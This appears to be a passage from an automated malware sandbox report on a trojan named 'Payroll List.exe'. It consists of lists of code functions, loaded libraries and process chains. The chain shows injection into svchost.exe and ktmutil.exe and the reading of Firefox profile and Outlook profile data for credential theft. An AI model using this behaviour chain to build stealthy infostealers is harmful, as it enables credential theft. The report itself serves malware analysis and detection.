Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B9C32
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Code function: 4_2_0518A59A
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Code function: 4_2_0518A5A3
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Code function: 4_2_0518883B
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Code function: 4_2_05190F03
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Code function: 4_2_0518A7C3
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Code function: 4_2_051A9273
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E602C0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E80274
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02EA03E6
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DEE3F0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9A352
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E72000
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E981CC
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02EA01AA
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E941A2
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E68158
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DD0100
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E7A118
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DFC6E0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DDC7C0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE0770
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E04750
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E8E4F6
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E92446
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E84420
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02EA0591
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE0535
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DDEA80
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E96BD7
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9AB40
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E0E8F0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DC68B8
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE2840
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DEA840
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02EAA9A6
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE29A0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DF6962
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9EEDB
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DF2E90
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9CE93
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE0E59
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9EE26
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DD2FC8
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DECFE0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E5EFA0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E54F40
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E22F28
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E00F30
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E82F30
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DD0CF2
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E80CB5
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE0C00
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DDADE0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DF8DBF
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DEAD00
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E7CD1F
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E812ED
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DFB2C0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE52A0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E2739A
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DCD34C
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9132D
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E970E9
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9F0E0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE70C0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E8F0CC
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DEB1B0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02EAB16B
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E1516C
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DCF172
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E916CC
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E25630
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9F7B0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DD1460
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9F43F
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02EA95C3
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E7D5B0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E97571
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E8DAC6
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E25AA0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E7DAAC
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E81AA3
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E53A6C
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9FA49
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E97A46
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E55BF0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E1DBF9
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DFFB80
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9FB76
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE38E0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E4D800
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE9950
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DFB950
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E75910
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE9EB0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DA3FD2
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DA3FD5
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE1F92
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9FFB1
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9FF09
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E9FCF2
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E59C32
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DFFDC0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E97D73
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02DE3D40
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02E91D5A
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_00411FB0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_0040CEE7
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_0040CEF0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_0040D110
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_0040B188
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_0040B190
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_00415610
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_00413850
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_0042BBC0
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02A4E344
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02A4E463
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02A4CA9B
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02A4D8C8
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: 6_2_02A4E805
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 02E5F290 appears 105 times
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 02E27E54 appears 111 times
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 02E4EA12 appears 86 times
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 02E15130 appears 58 times
Source: C:\Windows\SysWOW64\ktmutil.exe | Code function: String function: 02DCB970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 274 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 37 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 99 times
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: String function: 00146AC0 appears 42 times
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: String function: 0014F8A0 appears 35 times
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: String function: 0013EC2F appears 68 times
Source: Payroll List.exe, 00000000.00000003.1427600863.00000000036F3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payroll List.exe
Source: Payroll List.exe, 00000000.00000003.1425867649.000000000384D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payroll List.exe
Source: Payroll List.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/3@11/8
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_0016CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_0015AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_0015B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_0016E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_00166532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_0017C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\Payroll List.exe | Code function: 0_2_0012406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\Payroll List.exe | File created: C:\Users\user\AppData\Local\Temp\aut8438.tmp
Source: Payroll List.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\Payroll List.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ktmutil.exe, 00000006.00000002.3291580399.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1937880728.0000000002872000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1937880728.00000000028C9000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3291580399.0000000002893000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1937880728.0000000002893000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1936456100.0000000002893000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1936390356.00000000028A8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payroll List.exe | ReversingLabs: Detection: 57%
Source: unknown | Process created: C:\Users\user\Desktop\Payroll List.exe "C:\Users\user\Desktop\Payroll List.exe"
Source: C:\Users\user\Desktop\Payroll List.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payroll List.exe"
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
Source: C:\Windows\SysWOW64\ktmutil.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Payroll List.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\ktmutil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\ktmutil.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Payroll List.exe | Static file information: File size 1212928 > 1048576
Source: Payroll List.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payroll List.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payroll List.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Payroll List.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: eLiCpwzRIeWAs.exe, 00000004.00000000.1656145013.000000000061E000.00000002.00000001.01000000.00000005.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3291434953.000000000061E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payroll List.exe, 00000000.00000003.1434270538.0000000003770000.00000004.00001000.00020000.00000000.sdmp, Payroll List.exe, 00000000.00000003.1427600863.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1639800247.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734208595.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641453907.0000000003700000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000006.00000003.1744250358.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3292514897.0000000002F3E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000003.1742406359.0000000002A44000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdbGCTL source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: ktmutil.pdb source: svchost.exe, 00000002.00000002.1734052024.0000000003219000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1734033314.0000000003200000.00000004.00000020.00020000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000004.00000002.3292022741.0000000001548000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: ktmutil.exe, 00000006.00000002.3291580399.0000000002813000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000006.00000002.3293451407.00000000033CC000.00000004.10000000.00040000.00000000.sdmp, eLiCpwzRIeWAs.exe, 00000007.00000002.3292809726.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2045258675.00000000258CC000.00000004.80000000.00040000.00000000.sdmp
